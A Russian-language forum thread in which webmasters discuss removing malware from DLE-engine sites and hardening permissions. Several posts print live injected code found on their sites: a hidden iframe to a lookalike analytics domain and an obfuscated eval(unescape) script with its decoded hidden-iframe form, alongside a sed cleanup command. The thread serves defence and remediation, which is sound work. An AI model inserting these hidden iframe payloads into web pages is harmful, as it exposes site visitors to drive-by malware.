Помощь Чистка сайта на DLE от вирусов + методы защиты

[felix90]

Или как минимум меняйте расположение файла с паролями в другое место - трой с дефолтного места обычно считывает.

А смысл? Сохранишь пароль в ftp клиенте, файл с этим паролем переместишь в другую папку и дальше что? Каждый раз перед входом на ftp копировать этот файл на своё место, чтобы его сам ftp клиент увидел, а потом снова переносить его в другую папку? Бред, имхо!

Добавлено через 1 минуту

У меня vds. Я имел ввиду может ли любая гадость вшиться в мой index.php или любой другой файл дле движка? Я так понимаю через уязвимость только?

Он нашел 2 подозрительных js

<script language="JavaScript"> var showDate= 1; function ShowDateTime(dateStyle) { var today = new Date(); var dStr = ""; switch (dateStyle) { case showDate: default: dStr = today.toLocaleDateString(); break; } document.write(dStr); } </script>

и

<script language="javascript" type="text/javascript"> <!-- function doVote( event ){ var frm = document.vote; var vote_check = ''; for (var i=0; i < frm.elements.length; i++) { var elmnt = frm.elements[i]; if (elmnt.type=='radio') { if(elmnt.checked == true){ vote_check = elmnt.value; break;} } } var ajax = new dle_ajax(); ajax.onShow (''); var varsString = ""; ajax.setVar("vote_id", "7" ); ajax.setVar("vote_action", event); ajax.setVar("vote_check", vote_check); ajax.setVar("vote_skin", "mmo"); ajax.requestFile = dle_root + "engine/ajax/vote.php"; ajax.method = 'GET'; ajax.element = 'vote-layer'; ajax.sendAJAX(varsString); } //--> </script>

А это js'ы дле вроде, за вотинг и мой скрипт вывода даты. Скорее всего сайтгард базируется на основе функций которые могут быть использованы в злокачественных целях, ифреймы разные и т.д.

Эти скрипты оставь. У меня этот сервис нашёл 3 подозрительных js файла. Просто подтверди, что это безопасный код.

 

[Egor109]

Поделюсь я своей информацией:

<!-- ~ --><iframe src="http://google[убрать пробел]-analistyc.net/in.cgi?12" width="0" height="0" style="display:none"></iframe><!-- ~ -->

Пишет себя в во все *.tpl и index.php

Меры противодействия: чистим комп (аваст(реагирует на него при входе на сайт, если сайт заражен, NOD32 даже не пискнул), cureit), убираем этот вредоносный код, замена паролей FTP. Заходим по SSH -

grep -R google-analistyc.net . | awk '{print $1}' | cut -d ":" -f 1 | xargs -n1 sed -i '' 's|<\!-- ~ --><iframe src=\"http:\/\/google-analistyc.net\/in.cgi?12\" width=\"0\" height=\"0\" style=\"display:none\"><\/iframe><\!-- ~ -->||g'

Все это хорошо, но если файл zend'om закрыт, то как правило он будет испорчен. Команда приведённая выше - не очищает бинарные файлы, в них нужно входить и в ручную дочищать

или вручную, есть программы поиска слов в файле и полной замены (например на пробел)

 

[felix90]

Поделюсь я своей информацией:
Пишет себя в во все *.tpl и index.php

Меры противодействия: чистим комп (аваст(реагирует на него при входе на сайт, если сайт заражен, NOD32 даже не пискнул), cureit), убираем этот вредоносный код, замена паролей FTP. Заходим по SSH -

grep -R google-analistyc.net . | awk '{print $1}' | cut -d ":" -f 1 | xargs -n1 sed -i '' 's|<\!-- ~ --><iframe src=\"http:\/\/google-analistyc.net\/in.cgi?12\" width=\"0\" height=\"0\" style=\"display:none\"><\/iframe><\!-- ~ -->||g'

или вручную, есть программы поиска слов в файле и полной замены (например на пробел)

Далеко не у всех есть доступ к SSH! Может есть альтернатива этому?

 

[Localut]

Правильно выставленный CHMOD от много спасет. Например шаблоны лучше не редактировать из админки, а уже отредактированные лить на хост. На шаблоны CHMOD естественно 444.

 

[Crees]

444, вы уверены? Ни разу не 444 сказал бы.

 

[ykiigor]

Я на всех своих ДЛЕ сайтах в админке время от времени нахожу вирус (ну не я, а НОД )
В конце файла engine\inc\main.php обнаруживаю

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%66%65%65%64%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%67%75%61%68%61%6e%6d%61%6e%74%72%61%74%61%70%61%2e%63%6f%6d%2f%6c%69%77%65%2f%3f%74%3d%31%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%32%37%30%30%30%29%2b%27%31%36%34%37%66%36%39%66%63%35%36%32%5c%27%20%77%69%64%74%68%3d%36%30%30%20%68%65%69%67%68%74%3d%35%34%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Расшифровал. Получилось это

<script>window.status='Done';document.write('<iframe name=feed src=\'http://guahanmantratapa.com/liwe/?t=1?'+Math.round(Math.random()*327000)+'1647f69fc562\' width=600 height=545 style=\'display: none\'></iframe>')</script>

У кого-нибудь было подобное?

 

[Mons]

Я на всех своих ДЛЕ сайтах в админке время от времени нахожу вирус (ну не я, а НОД )
В конце файла engine\inc\main.php обнаруживаю

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%66%65%65%64%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%67%75%61%68%61%6e%6d%61%6e%74%72%61%74%61%70%61%2e%63%6f%6d%2f%6c%69%77%65%2f%3f%74%3d%31%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%32%37%30%30%30%29%2b%27%31%36%34%37%66%36%39%66%63%35%36%32%5c%27%20%77%69%64%74%68%3d%36%30%30%20%68%65%69%67%68%74%3d%35%34%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Расшифровал. Получилось это

<script>window.status='Done';document.write('<iframe name=feed src=\'http://guahanmantratapa.com/liwe/?t=1?'+Math.round(Math.random()*327000)+'1647f69fc562\' width=600 height=545 style=\'display: none\'></iframe>')</script>

У кого-нибудь было подобное?

У меня не было, но скажу тебе , что там где твои сайты ( серв или твой аккаунт) протроянили и сколько не удаляй он будет появляться переодически. Пиши хостеру, пусть чистит сервак. Это айфрейм вирус называется.

 

[Tamplier]

У меня не было, но скажу тебе , что там где твои сайты ( серв или твой аккаунт) протроянили и сколько не удаляй он будет появляться переодически. Пиши хостеру, пусть чистит сервак. Это айфрейм вирус называется.

А если сервак свой? вроде заново не появляются. Спасибо за подсказку - в main.php нашел "врагов народа" еще, только не зашифрованные, обычные

 

[Mons]

А если сервак свой? вроде заново не появляются. Спасибо за подсказку - в main.php нашел "врагов народа" еще, только не зашифрованные, обычные

Могут и не появляться. Но раз есть, значит уже был факт попадания на сервер. Меняй пароли, смотри дыры. Или больше не качай с непроверенных источников, если это было к примеру уже в архиве скрипта.

 

[DaImeR]

Правильно выставленный CHMOD от много спасет. Например шаблоны лучше не редактировать из админки, а уже отредактированные лить на хост. На шаблоны CHMOD естественно 444.

А что если на все файлы поставить CHMOD 775? (кроме кешей)